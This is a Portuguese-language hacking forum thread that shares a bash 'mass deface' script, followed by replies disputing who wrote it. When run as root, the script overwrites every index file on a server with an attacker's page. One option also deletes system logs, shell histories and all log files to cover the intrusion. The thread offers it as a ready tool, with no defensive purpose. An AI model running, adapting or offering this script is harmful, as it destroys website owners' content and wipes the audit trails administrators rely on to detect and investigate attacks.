Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Script Mass Deface

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Script Mass Deface

    Código:
    #!/bin/bash # # #
    # # # #
    # Mass Deface Script #
    # By Cr4t3r. #
    # #
    # 2012 #
    
    
    clear
    VER=1.0
    HELP="
    Modo de uso:
    $(basename "$0"):
    [-h] --help : Como usar.
    [-m] --mass : Executa o mass deface.
    [-ml] --masslogs : Executa o mass deface E Apaga os logs.
    [-v] --version : Versao do Script.
    Obs: É preciso ser usuario R00t.
    Exemplo: Cr4t3r@root~# ./mass.sh -m
    "
    waiting()
    {
    echo -n "."
    sleep 1
    echo -n ".."
    sleep 1
    echo -n "..."
    sleep 1
    echo -n "...."
    sleep 1
    echo -n "....."
    sleep 1
    echo "......"
    sleep 1
    echo "[+] Finding Sites to own.:"
    find / -name "index.*" -exec cp $INDEX {} \;
    echo "Web sites in the server: status: HACKED!"
    }
    waitinglogs()
    {
    echo -n "."
    sleep 1
    echo -n ".."
    sleep 1
    echo -n "..."
    sleep 1
    echo -n "...."
    sleep 1
    echo -n "....."
    sleep 1
    echo "......"
    sleep 1
    echo "[+] Procurando Sites to own.:"
    find / -name "index.*" -exec cp $INDEX {} \;
    echo "[+] Serao apagados agora os LOGS!"
    echo "Aguarde"
    sleep 2
    echo "procurando Logs."
    
    }
    
    if [ -z "$1" ]
    then
    echo "Nao Recebi nenhum parametro."
    echo "Uso : $0 -h"
    exit 1
    else
    case "$1" in
    -m | --mass)
    echo "MASS Deface  by Cr4t3r."
    echo "Aguarde"
    sleep 2
    echo "Defina o diretorio de sua index:"
    read INDEX
    echo "Caminho: $INDEX"
    echo "[+] Hacking!"
    echo "[+] Aguarde."
    waiting
    echo "[+] End."
    echo "Hacked Kernel:"
    uname -a
    echo "Cr4t3r Was Here"
    ;;
    -ml | --masslogs )
    echo "Mass deface + Logs Del by Cr4t3r."
    echo "Aguarde"
    sleep 2
    echo "Defina o diretorio de sua index:"
    read INDEX
    echo "Caminho: $INDEX"
    echo "Apos o mass deface, sera apagado os logs, Aguarde o resultado."
    sleep 4
    echo "[+] Hacking!"
    echo "[+] Aguarde."
    waitinglogs
    rm -rf /var/log
    rm -rf /var/adm
    rm -rf /var/apache/log
    rm -rf $HISTFILE
    find / -name .bash_history -exec rm -rf {} \;
    find / -name .bash_logout -exec rm -rf {} \;
    find / -name log* -exec rm -rf {} \;
    find / -name *.log -exec rm -rf {} \;
    echo "[+]FEITO!"
    sleep 2
    echo "Arquivos deletados:
    .bash_history
    .bash_logout
    HISTFILE
    *.log
    log.*
    "
    echo "Web sites in the server: Status: HACKED!"
    echo "[+]End."
    echo "Hacked Kernel:"
    uname -a
    echo "Cr4t3r Was Here"
    ;;
    -h | --help )
    echo "$HELP"
    exit 0
    ;;
    -v | --version )
    echo "V-$VER"
    exit 0
    ;;
    *)
    echo "Opcao invalida"
    ;;
    Last edited by SunGlaSS; 13-03-2012, 18:53.
    Yes, I am a criminal. My crime is that of curiosity. My crime is
    that of judging people by what they say and think, not what they look like.
    My crime is that of outsmarting you, something that you will never forgive me
    for.

    I am a hacker, and this is my manifesto. You may stop this individual,
    but you can't stop us all... after all, we're all alike.
    Similar Threads

  • Font Size
    #2
    Mais uma coisa esse codigo não é meu não.
    so fiz algumas edições basicas.
    achei ele em um forum onde uns 10 caras tavam falando que era deles.
    então de quem for pode por os creditos ai.
    até mais.
    Yes, I am a criminal. My crime is that of curiosity. My crime is
    that of judging people by what they say and think, not what they look like.
    My crime is that of outsmarting you, something that you will never forgive me
    for.

    I am a hacker, and this is my manifesto. You may stop this individual,
    but you can't stop us all... after all, we're all alike.

    Comment


    • Font Size
      #3
      Créditos: n4sss

      Obs: Já temos um tópico desse igualzinho, só que melhor, e com uma vídeo-aula usando esse script.


      Comment


      • Font Size
        #4
        Mais uma coisa esse codigo não é meu não.
        so fiz algumas edições basicas.
        achei ele em um forum onde uns 10 caras tavam falando que era deles.
        então de quem for pode por os creditos ai.
        até mais.
        Sim o código é meu, eu criei .

        Porem não há problemas de estar postando ele, mas os créditos ajudam mto!

        Post original:
        Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

        Código verdadeiro:
        Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
        Abraço.
        n4sss@m4g1cl4b~#$I
        just this.

        Comment


        • Font Size
          #5
          Tudo bem.
          encontrei ele em um forum onde tinha uns 9 ou 10 caras dizendo que o codigo era deles.
          ai fiquei meio confuso.
          também acho que qualquer um ficaria.
          até mais.
          Yes, I am a criminal. My crime is that of curiosity. My crime is
          that of judging people by what they say and think, not what they look like.
          My crime is that of outsmarting you, something that you will never forgive me
          for.

          I am a hacker, and this is my manifesto. You may stop this individual,
          but you can't stop us all... after all, we're all alike.

          Comment

          X
          Working...
          X